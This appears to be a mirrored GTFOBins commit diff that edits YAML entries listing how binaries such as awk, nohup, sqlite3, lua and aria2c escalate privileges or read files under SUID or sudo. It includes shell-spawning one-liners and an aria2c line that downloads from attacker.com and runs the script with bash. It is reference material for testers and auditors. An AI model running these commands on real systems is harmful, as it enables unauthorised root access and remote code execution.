mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Minor fixes to SUID mainly
commit
eba354eda0
@ -10,13 +10,6 @@ functions:
|
|||||||
aria2c --on-download-error=$TF http://x
|
aria2c --on-download-error=$TF http://x
|
||||||
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
- description: The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
||||||
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
code: aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
|
||||||
suid:
|
|
||||||
- code: |
|
|
||||||
COMMAND='id'
|
|
||||||
TF=$(mktemp)
|
|
||||||
echo "$COMMAND" > $TF
|
|
||||||
chmod +x $TF
|
|
||||||
./aria2c --on-download-error=$TF http://x
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
COMMAND='id'
|
COMMAND='id'
|
||||||
@ -24,4 +17,11 @@ functions:
|
|||||||
echo "$COMMAND" > $TF
|
echo "$COMMAND" > $TF
|
||||||
chmod +x $TF
|
chmod +x $TF
|
||||||
sudo aria2c --on-download-error=$TF http://x
|
sudo aria2c --on-download-error=$TF http://x
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
COMMAND='id'
|
||||||
|
TF=$(mktemp)
|
||||||
|
echo "$COMMAND" > $TF
|
||||||
|
chmod +x $TF
|
||||||
|
./aria2c --on-download-error=$TF http://x
|
||||||
---
|
---
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
awk '//' "$LFILE"
|
awk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./awk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -17,6 +17,11 @@ functions:
|
|||||||
ed file_to_read
|
ed file_to_read
|
||||||
,p
|
,p
|
||||||
q
|
q
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
./ed file_to_read
|
||||||
|
,p
|
||||||
|
q
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo ed
|
sudo ed
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
gawk '//' "$LFILE"
|
gawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./gawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo gawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -7,7 +7,7 @@ functions:
|
|||||||
suid:
|
suid:
|
||||||
- code: |
|
- code: |
|
||||||
./hping3
|
./hping3
|
||||||
/bin/sh
|
/bin/sh -p
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
sudo hping3
|
sudo hping3
|
||||||
|
@ -59,6 +59,8 @@ functions:
|
|||||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||||
file-read:
|
file-read:
|
||||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||||
|
suid:
|
||||||
|
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo lua -e 'os.execute("/bin/sh")'
|
- code: sudo lua -e 'os.execute("/bin/sh")'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
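Review bot: The added `suid:` entry for lua invokes `lua -e '…'` from PATH, while the other SUID entries added in this commit run the local copy (`./awk`, `./ed`, `./gawk`, `./mawk`, `./nawk`, `./nohup`). As written, the line is identical to the unprivileged `file-read` entry directly above it. For consistency it should begin `- code: ./lua -e '…'`. The sqlite3 section has the same inconsistency: its added `suid:` block opens with `sqlite3 << EOF` rather than `./sqlite3 << EOF`. Anyone using these entries to audit which binaries should lose the SUID bit relies on the section marking the privileged invocation accurately.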
|
@ -4,12 +4,12 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
lwp-request "file://$LFILE"
|
lwp-request "file://$LFILE"
|
||||||
suid:
|
|
||||||
- code: |
|
|
||||||
LFILE=file_to_read
|
|
||||||
./lwp-request "file://$LFILE"
|
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
sudo lwp-request "file://$LFILE"
|
sudo lwp-request "file://$LFILE"
|
||||||
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./lwp-request "file://$LFILE"
|
||||||
---
|
---
|
||||||
|
@ -10,6 +10,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
mawk '//' "$LFILE"
|
mawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./mawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo mawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -27,6 +27,10 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
LFILE=file_to_read
|
LFILE=file_to_read
|
||||||
nawk '//' "$LFILE"
|
nawk '//' "$LFILE"
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
./nawk '//' "$LFILE"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nawk 'BEGIN {system("/bin/sh")}'
|
- code: sudo nawk 'BEGIN {system("/bin/sh")}'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|
@ -85,7 +85,7 @@ functions:
|
|||||||
file-write:
|
file-write:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
|
echo 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
- description: The payload appears inside the regular nmap output.
|
- description: The payload appears inside the regular nmap output.
|
||||||
code: |
|
code: |
|
||||||
@ -94,7 +94,7 @@ functions:
|
|||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
echo 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
||||||
nmap --script=$TF
|
nmap --script=$TF
|
||||||
sudo:
|
sudo:
|
||||||
- description: Input echo is disabled.
|
- description: Input echo is disabled.
|
||||||
|
@ -7,8 +7,8 @@ functions:
|
|||||||
COMMAND='/usr/bin/id'
|
COMMAND='/usr/bin/id'
|
||||||
nohup "$COMMAND"
|
nohup "$COMMAND"
|
||||||
cat nohup.out
|
cat nohup.out
|
||||||
|
suid:
|
||||||
|
- code: ./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
- code: sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
|
||||||
suid:
|
|
||||||
- code: sudo nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
|
|
||||||
---
|
---
|
||||||
|
@ -14,6 +14,14 @@ functions:
|
|||||||
.import $LFILE t
|
.import $LFILE t
|
||||||
SELECT * FROM t;
|
SELECT * FROM t;
|
||||||
EOF
|
EOF
|
||||||
|
suid:
|
||||||
|
- code: |
|
||||||
|
LFILE=file_to_read
|
||||||
|
sqlite3 << EOF
|
||||||
|
CREATE TABLE t(line TEXT);
|
||||||
|
.import $LFILE t
|
||||||
|
SELECT * FROM t;
|
||||||
|
EOF
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
|
||||||
limited-suid:
|
limited-suid:
|
||||||
|